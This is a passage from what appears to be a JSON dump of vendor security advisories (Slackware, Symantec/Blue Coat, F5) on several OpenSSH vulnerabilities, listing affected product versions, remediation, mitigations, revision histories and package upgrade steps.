package:\n45c8e0c84e13d0c0a9914087898cefbd openssh-7.4p1-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n8e66d220fb2c3da97bf912a487436ac6 openssh-7.4p1-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n690e285ce2aeeee6f670451034ae3ec6 openssh-7.4p1-i586-1_slack14.2.txz\n\nSlackware 
x86_64 14.2 package:\n6a2b3846149a9f8071f2751aed452f53 openssh-7.4p1-x86_64-1_slack14.2.txz\n\nSlackware -current package:\ne0d8576b19ebe4da64f5d72474693295 n/openssh-7.4p1-i586-1.txz\n\nSlackware x86_64 -current package:\n1a8bbe8129a9c28fb9eb98b202646b46 n/openssh-7.4p1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg openssh-7.4p1-i586-1_slack14.2.txz\n\nNext, restart the sshd daemon:\n > sh /etc/rc.d/rc.sshd restart", "modified": "2016-12-24T01:35:34", "published": "2016-12-24T01:35:34", "id": "SSA-2016-358-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.647637", "type": "slackware", "title": "[slackware-security] openssh", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2021-01-13T08:42:11", "bulletinFamily": "software", "cvelist": ["CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012"], "description": "### SUMMARY\n\nBlue Coat products using affected versions of OpenSSH are susceptible to several vulnerabilities. A remote attacker with access to an SSH server can exploit these vulnerabilities to execute arbitrary code on an SSH client. A local attacker can also exploit these vulnerabilities to obtain private key information and escalate their privileges on the system. \n \n\n\n### AFFECTED PRODUCTS\n\nThe following products are vulnerable:\n\n**Director** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 6.1 | Upgrade to a version of MC with the fixes. \n \n \n\n**Malware Analysis Appliance (MAA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011 \nCVE-2016-10012 | 4.2 | Upgrade to 4.2.12. \n \n \n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.4 and later | Not vulnerable, fixed in 5.4.1 \n5.3 | Upgrade to later release with fixes. 
\n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10012, CVE-2016-10011 | 5.3 | A fix will not be provided. \n \n \n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10012, CVE-2016-10011 | 5.3 | A fix will not be provided. Customers who use NSP for USB cleaning can switch to a version of ICSP with fixes. \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 7.3 and later | Not vulnerable, fixed in 7.3.1. \n7.2 | Upgrade to 7.2.3. \n7.1 | Upgrade to later release with fixes. \n6.6 | Upgrade to later release with fixes. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 9.7, 10.0, 11.0 | A fix will not be provided. \n \n \n\nThe following products have a vulnerable version of OpenSSH, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 7.1 and later | Not vulnerable, fixed in 7.1.1.1 \n6.7 | Upgrade to 6.7.4.2. \n6.6 | Upgrade to later release with fixes. \n \n \n\n**Content Analysis System (CAS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 3.0 and later | Not vulnerable, fixed in 3.0.1.1 \n2.3, 2.4 | Not available at this time \n1.3, 2.1, 2.2 | Upgrade to later release with fixes. \n \n \n\n**Mail Threat Defense (MTD)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 1.1 | Upgrade to a version of CAS and SMG with the fixes. 
\n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 3.0 | Not vulnerable, fixed in 3.0.1.1 \n2.4 | Not available at this time \n2.3 and earlier | Upgrade to later release with fixes. \n \n \n\n**PacketShaper (PS) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 11.5, 11.6, 11.7, 11.8, 11.9, 11.10 | A fix will not be provided. Allot Secure Services Gateway (SSG) is a replacement product for PS S-Series. Switch to a version of SSG with the vulnerability fixes. \n \n \n\n**PolicyCenter (PC) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 1.1 | A fix will not be provided. Allot NetXplorer is a replacement product for PC S-Series. Switch to a version of NetXplorer with the vulnerability fixes. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 10.3 and later | Not vulnerable, fixed in 10.3.1.1 \n10.1, 10.2 | Upgrade to later release with fixes. \nAll CVEs | 9.4, 9.5 | Not vulnerable \n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.0 | Not vulnerable, fixed in 5.0.2.1. \n4.5 | Not vulnerable, fixed in 4.5.1.1. \n4.0, 4.1, 4.2, 4.3, 4.4 | Upgrade to later release with fixes. \n3.12 | Upgrade to later release with fixes. \n3.11 | Upgrade to later release with fixes. \n3.10 | Upgrade to later release with fixes. \n3.9 | Upgrade to later releases with fixes. \n3.8.4FC | Upgrade to later releases with fixes. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION \n\nBlue Coat products do not enable or use all functionality within OpenSSH. The products listed below do not utilize the functionality described in the CVEs below and are thus not known to be vulnerable to them. 
However, fixes for these CVEs will be included in the patches that are provided.\n\n * **ASG:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **CAS:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **MTD:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **MC:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **PacketShaper S-Series:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **PolicyCenter S-Series:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **Reporter 10.x:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **SSLV:** all CVEs\n * **XOS 9.7:** CVE-2016-10010\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nPacketShaper \nPolicyCenter \nProxyAV \nProxyAV ConLog and ConLogXP \nProxyClient \nProxySG \nUnified Agent \nWeb Isolation**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. 
\n \n\n\n### ISSUES\n\n**CVE-2016-10009** \n--- \n**Severity / CVSSv2** | High / 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n**References** | SecurityFocus: [BID 94968](<https://www.securityfocus.com/bid/94968>) / NVD: [CVE-2016-10009](<https://nvd.nist.gov/vuln/detail/CVE-2016-10009>) \n**Impact** | Code execution \n**Description** | A flaw in ssh-agent allows a remote attacker with local access to an SSH server to execute arbitrary code on an SSH client host that enables agent forwarding. \n \n \n\n**CVE-2016-10010** \n--- \n**Severity / CVSSv2** | Medium / 6.9 (AV:L/AC:M/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 94972](<https://www.securityfocus.com/bid/94972>) / NVD: [CVE-2016-10010](<https://nvd.nist.gov/vuln/detail/CVE-2016-10010>) \n**Impact** | Privilege escalation \n**Description** | A flaw in the SSH daemon with privilege separation disabled allows a local attacker to escalate their privileges on the system via unspecified vectors. \n \n \n\n**CVE-2016-10011** \n--- \n**Severity / CVSSv2** | Low / 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N) \n**References** | SecurityFocus: [BID 94977](<https://www.securityfocus.com/bid/94977>) / NVD: [CVE-2016-10011](<https://nvd.nist.gov/vuln/detail/CVE-2016-10011>) \n**Impact** | Information disclosure \n**Description** | A flaw in the SSH daemon with privilege separation enabled allows a local attacker with access to a privilege-separated child process to obtain private key information. \n \n \n\n**CVE-2016-10012** \n--- \n**Severity / CVSSv2** | High / 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 94975](<https://www.securityfocus.com/bid/94975>) / NVD: [CVE-2016-10012](<https://nvd.nist.gov/vuln/detail/CVE-2016-10012>) \n**Impact** | Privilege escalation \n**Description** | A flaw in the SSH daemon pre-authentication compression implementation allows a local attacker with access to a sandboxed privilege-separated child process to escalate their privileges on the system. 
\n \n \n\n### MITIGATION\n\nBy default, Director does not enable privilege separation and pre-authentication compression. Customers who leave this default behavior unchanged prevent attacks against these products using CVE-2016-10010, CVE-2016-10011, and CVE-2016-10012.\n\nBy default, MAA, ICSP, NNP, and NSP do not use ssh-agent and do not enable SSH agent forwarding and pre-authentication compression. Customers who leave this default behavior unchanged prevent attacks against these products using CVE-2016-10009 and CVE-2016-10011.\n\nBy default, Security Analytics does not use ssh-agent and does not enable SSH agent forwarding and pre-authentication compression. Customers who leave this default behavior unchanged prevent attacks against these products using CVE-2016-10009 and CVE-2016-10012.\n\n### REVISION \n\n2021-01-12 A fix for SSLV 3.10 and SSLV 3.12 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-11-17 A fix for MTD 1.1 will not be provided. Please upgrade to a version of CAS and SMG with the vulnerability fixes. A fix for XOS 9.7, 10.0, and 11.0 will not be provided. A fix for Director 6.1 will not be provided. Please upgrade to a version of MC with the vulnerability fixes. \n2020-08-19 MC 3.0 is not vulnerable because a fix is available in 3.0.1.1. A fix for MC 2.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-04-27 A fix for Advanced Secure Gateway (ASG) 6.7 is available in 6.7.4.2. ASG 7.1 and later versions are not vulnerable because a fix is available in 7.1.1.1. Content Analysis (CA) 2.4 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. CA 3.0 is not vulnerable because a fix is available in 3.0.1.1. Fixes will not be provided for Industrial Control System Protection (ICSP) 5.3 and SSL Visibility (SSLV) 4.4. Please upgrade to later versions with the vulnerability fixes. 
\n2020-04-04 A fix for PacketShaper S-Series will not be provided. Allot Secure Services Gateway (SSG) is a replacement product for PacketShaper S-Series. Switch to a version of SSG with the vulnerability fixes. A fix for PolicyCenter S-Series will not be provided. Allot NetXplorer is a replacement product for PolicyCenter S-Series. Switch to a version of NetXplorer with the vulnerability fixes. \n2019-10-02 Web Isolation is not vulnerable. \n2019-09-05 A fix for MC 2.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-29 Reporter 10.3 and 10.4 are not vulnerable because a fix for all CVEs is available in 10.3.1.1. \n2019-08-12 MC 2.2 and MC 2.3 have vulnerable versions of OpenSSH, but are not vulnerable to known vectors of attack. A fix for MC 2.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-09 SSLV 4.5 is not vulnerable because a fix is available in 4.5.1.1. \n2019-08-07 A fix for ASG 6.6 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-06 A fix for Reporter 10.1 and 10.2 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-05 A fix for SSLV 4.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-02-04 A fix will not be provided for CA 1.3 and 2.2. Please upgrade to a later version with the vulnerability fixes. \n2019-01-21 Security Analytics 8.0 is not vulnerable. ICSP 5.3 is vulnerable to all CVEs. ICSP 5.4 is not vulnerable because a fix is available in 5.4.1. \n2019-01-18 SSLV 4.3 and 4.4 have vulnerable version of OpenSSH, but are not vulnerable to known vectors of attack. SSLV 5.0 is not vulnerable because a fix is available in 5.0.2.1. \n2019-01-14 MC 2.1 and Reporter 10.3 have vulnerable versions of OpenSSH, but are not vulnerable to known vectors of attack. A fix for MC 1.11 will not be provided. 
Please upgrade to a later version with the vulnerability fixes. \n2019-01-12 A fix for Security Analytics 7.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-11 A fix for CA 2.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-09-24 A fix for SSLV 3.8.4FC will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-08-03 Customers who use NSP for USB cleaning can switch to a version of Industrial Control System Protection (ICSP) with fixes. \n2018-07-27 A fix for MA 4.2 is available in 4.2.12. \n2018-07-26 MC 2.0 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2018-06-29 A fix for Norman Shark Network Protection (NNP) 5.3 and Norman Shark SCADA Protection (NSP) 5.3 will not be provided. \n2018-06-26 A fix for SSLV 4.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-06-25 A fix for SSLV 3.11 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-26 A fix for SSLV 4.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-25 A fix for XOS 9.7 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-22 CA 2.3, PacketShaper S-Series 11.10, and Reporter 10.2 have a vulnerable version of OpenSSH, but are not vulnerable to known vectors of attack. \n2017-11-16 A fix for PS S-Series 11.5, 11.7, and 11.8 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-16 A fix for SSLV 3.9 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-15 SSLV 3.12 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. A fix is not available at this time. 
\n2017-11-15 SSLV 4.2 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. A fix is not available at this time. \n2017-11-09 MC 1.11 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. A fix for MC 1.10 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-08 CAS 2.2 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2017-11-06 ASG 6.7 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2017-08-03 SSLV 4.1 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. A fix is not available at this time. \n2017-06-05 PS S-Series 11.9 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2017-07-23 MC 1.10 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. A fix for MC 1.9 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-06-22 Security Analytics 7.3 is not vulnerable. \n2017-06-08 Reporter 10.1 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. Reporter 9.4 and 9.5 are not vulnerable. \n2017-06-05 PS S-Series 11.8 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2017-05-29 A fix for Security Analytics 6.6 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-05-19 CAS 2.1 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2017-05-03 Director 6.1 is vulnerable to all CVEs. \n2017-03-30 MC 1.9 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. 
\n2017-03-02 initial public release\n", "modified": "2021-01-13T07:45:44", "published": "2017-03-02T08:00:00", "id": "SMNTC-1397", "href": "", "type": "symantec", "title": "SA144 : OpenSSH Vulnerabilities January 2017", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-15T22:53:26", "bulletinFamily": "software", "cvelist": ["CVE-2016-10708", "CVE-2018-15473", "CVE-2018-15919"], "description": "### SUMMARY\n\nSymantec Network Protection products using affected versions of OpenSSH are susceptible to several vulnerabilities. A remote attacker, with access to the management interface, can obtain usernames for valid SSH users and cause denial of service through application crashes.\n\n \n\n### AFFECTED PRODUCTS \n\nAdvanced Secure Gateway (ASG) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 6.6 | Upgrade to 6.6.5.18. \n6.7 | Upgrade to 6.7.4.2. \n \n \n\nCacheFlow (CF) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 3.4 | A fix will not be provided. Please switch to a version of ProxySG MACH5 Edition with fixes. \n \n \n\nContent Analysis (CA) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 1.3 | Upgrade to later version with fixes. \n2.1 and later | Not vulnerable \n \n \n\nDirector \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nAll CVEs | 6.1 | Upgrade to a version of MC with the fixes. \n \n \n\nMail Threat Defense (MTD) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 1.1 | Upgrade to a version of CAS and SMG with the fixes. \n \n \n\nMalware Analysis (MA) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 4.2 | Upgrade to a version of Content Analysis with fixes. 
\n \n \n\nManagement Center (MC) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 2.0, 2.3 | Upgrade to later release with fixes. \n2.4, 3.0 | Not available at this time \n3.1 | Not vulnerable, fixed in 3.1.1.1 \n \n \n\nPacketShaper (PS) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708 | 9.2 | A fix will not be provided. Allot Secure Services Gateway (SSG) is a replacement product for PacketShaper. Switch to a version of SSG with the vulnerability fixes. \n \n \n\nPacketShaper (PS) S-Series \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 11.6, 11.9, 11.10 | A fix will not be provided. Allot Secure Services Gateway (SSG) is a replacement product for PS S-Series. Switch to a version of SSG with the vulnerability fixes. \n \n \n\nPolicyCenter (PC) S-Series \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 1.1 | A fix will not be provided. Allot NetXplorer is a replacement product for PC S-Series. Switch to a version of NetXplorer with the vulnerability fixes. \n \n \n\nProxySG \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 6.5 | Upgrade to 6.5.10.15. \n6.6 | Upgrade to 6.6.5.18. \n6.7 | Upgrade to 6.7.4.2. \n \n \n\nReporter \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708 | 9.5 | Not vulnerable \n10.1, 10.2 | Upgrade to later release with fixes. \n10.3 and later | Not vulnerable, fixed in 10.3.1.1 \nCVE-2018-15473 | 9.5 | Not vulnerable \n10.1, 10.2, 10.3, 10.4 | Upgrade to later release with fixes. \n10.5 | Not available at this time \n \n \n\nSecurity Analytics (SA) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-15473 | 7.2 | Not available at this time \n7.3, 8.0 | Upgrade to later release with fixes. \n8.1 and later | Not vulnerable, fixed. 
\nCVE-2018-15919 | 7.2, 8.1 | Not available at this time \n7.3, 8.0 | Upgrade to later release with fixes. \n8.2 and later | Not vulnerable, fixed in 8.2.1 \n \n \n\nSSL Visibility (SSLV) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nAll CVEs | 3.10 | Upgrade to later release with fixes. \n3.12 | Upgrade to later release with fixes. \n4.2 and later | Not vulnerable \n \n \n\nWeb Isolation (WI) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-15919 | 1.12 | Upgrade to later release with fixes. \n1.13, 1.14 | Not available at this time \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 10.0, 11.0 | A fix will not be provided. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION \n\nThe following products are not vulnerable: \n**AuthConnector \nBCAAA \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server** \n**General Auth Connector Login Application \nHSM Agent for the Luna SP \nIntelligenceCenter \nIntelligenceCenter Data Collector \nPolicyCenter \nProxyAV \nProxyAV ConLog and ConLogXP \nUnified Agent \nWSS Mobile Agent**\n\n### ISSUES\n\nCVE-2016-10708 \n--- \n**Severity / CVSSv3** | High / 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n**References** | SecurityFocus: [BID 102780](<https://www.securityfocus.com/bid/102780>) / NVD: [CVE-2016-10708](<https://nvd.nist.gov/vuln/detail/CVE-2016-10708>) \n**Impact** | Denial of service \n**Description** | A flaw in SSH message handling allows a remote attacker to send out-of-sequence NEWKEYS messages and cause an application crash, resulting in denial of service. 
\n \n \n\nCVE-2018-15473 \n--- \n**Severity / CVSSv3** | Medium / 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n**References** | SecurityFocus: [BID 105140](<https://www.securityfocus.com/bid/105140>) / NVD: [CVE-2018-15473](<https://nvd.nist.gov/vuln/detail/CVE-2018-15473>) \n**Impact** | Information disclosure \n**Description** | A flaw in user authentication allows a remote attacker to discover usernames for valid users on the target. \n \n \n\nCVE-2018-15919 \n--- \n**Severity / CVSSv3** | Medium / 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n**References** | SecurityFocus: [BID 105163](<https://www.securityfocus.com/bid/105163>) / NVD: [CVE-2018-15919](<https://nvd.nist.gov/vuln/detail/CVE-2018-15919>) \n**Impact** | Information disclosure \n**Description** | A flaw in GSS2 handling allows a remote attacker to discover usernames for valid users on the target. \n \n \n\n### MITIGATION\n\nThese vulnerabilities can be exploited only through the management interfaces for all vulnerable products. Allowing only machines, IP addresses and subnets from a trusted network to access the management interface reduces the threat of exploiting the vulnerabilities.\n\n \n\n### REVISION\n\n2021-01-15 WI 1.14 is vulnerable to CVE-2018-15919. A fix is not available at this time. Fixes will not be provided for WI 1.12. Please upgrade to a later release with the vulnerability fixes. \n2021-01-12 A fix for SSLV 3.10 and SSLV 3.12 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-12-09 SA 8.2 is not vulnerable because a fix is available in 8.2.1. \n2020-11-30 MC 3.1 is not vulnerable because a fix is available in 3.1.1.1. \n2020-11-19 A fix for MTD 1.1 will not be provided. Please upgrade to a version of CAS and SMG with the vulnerability fixes. A fix for SA 7.3 and 8.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. A fix for XOS 9.7, 10.0, and 11.0 will not be provided. 
A fix for Director 6.1 will not be provided. Please upgrade to a version of MC with the vulnerability fixes. A fix for Reporter 10.4 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-08-19 A fix for MC 2.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-06-01 A fix for CacheFlow will not be provided. Please switch to a version of ProxySG MACH5 Edition with the vulnerability fixes. \n2020-04-05 A fix for Management Center 2.2 will not be provided. A fix for CVE-2018-15473 in Reporter 10.3 will not be provided. Please upgrade to later versions with the vulnerability fixes. Management Center 2.4 is vulnerable to CVE-2016-10708 and CVE-2018-15473. Reporter 10.5 is vulnerable to CVE-2018-15473. Security Analytics 8.1 is vulnerable to CVE-2018-15919. Security Analytics 8.1 is not vulnerable to CVE-2018-15473 because a fix is available in 8.1.1. \n2020-04-04 A fix for PacketShaper S-Series will not be provided. Allot Secure Services Gateway (SSG) is a replacement product for PacketShaper S-Series. Switch to a version of SSG with the vulnerability fixes. A fix for PolicyCenter S-Series will not be provided. Allot NetXplorer is a replacement product for PolicyCenter S-Series. Switch to a version of NetXplorer with the vulnerability fixes. \n2020-01-19 A fix for Malware Analysis will not be provided. Upgrade to a version of Content Analysis with the vulnerability fixes. \n2019-10-07 WI 1.12 and 1.3 are vulnerable to CVE-2018-15919. A fix is not available at this time. \n2019-09-05 A fix for MC 2.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-30 It was previously reported that Reporter 10.3 is vulnerable to CVE-2018-15919. Reporter 10.3 is instead vulnerable to CVE-2018-15473. Reporter 10.4 is also vulnerable to CVE-2018-15473. \n2019-08-13 MC 2.2 and MC 2.3 are vulnerable to CVE-2016-10708 and CVE-2018-15473. A fix for MC 2.0 will not be provided. 
Please upgrade to a later version with the vulnerability fixes. \n2019-08-09 A fix for ProxySG 6.5 is available in 6.5.10.15. \n2019-08-09 A fix for ASG 6.6 and ProxySG 6.6 is available in 6.6.5.18. \n2019-08-06 A fix for Reporter 10.1 and 10.2 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-02-04 A fix for CA 1.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-15 A fix for ASG 6.7 and ProxySG 6.7 is available in 6.7.4.2. \n2019-01-14 Reporter 10.3 is vulnerable to CVE-2018-15919. It is not vulnerable to CVE-2016-10708 because a fix is available in 10.3.1.1. \n2018-11-29 initial public release\n", "modified": "2021-01-15T21:23:40", "published": "2018-11-29T08:01:01", "id": "SMNTC-1469", "href": "", "type": "symantec", "title": "OpenSSH Vulnerabilities Jan-Aug 2018", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "f5": [{"lastseen": "2020-04-06T22:40:12", "bulletinFamily": "software", "cvelist": ["CVE-2016-10708"], "description": "\nF5 Product Development has assigned ID 712608 (BIG-IP), ID 712649 (BIG-IQ and F5 iWorkflow), ID 712648 (Enterprise Manager), and ID 431179 (ARX) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H32485746 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. 
To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 15.x | None | Not applicable | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \n14.x | 14.0.0 - 14.0.1 | 14.1.0 \n13.x | 13.1.0 - 13.1.3 | None \n12.x | 12.1.0 - 12.1.5 | None \n11.x | 11.2.1 - 11.6.5 | None \nARX | 6.x | 6.2.0 - 6.4.0 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \nEnterprise Manager | 3.x | 3.1.1 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \nBIG-IQ Centralized Management | 5.x | 5.0.0 - 5.4.0 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \nLineRate | 2.x | 2.5.0 - 2.6.2 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \n4.x | 4.0.5 - 4.4.0 | None \n \n1The CVSSv3 score link takes you to a 
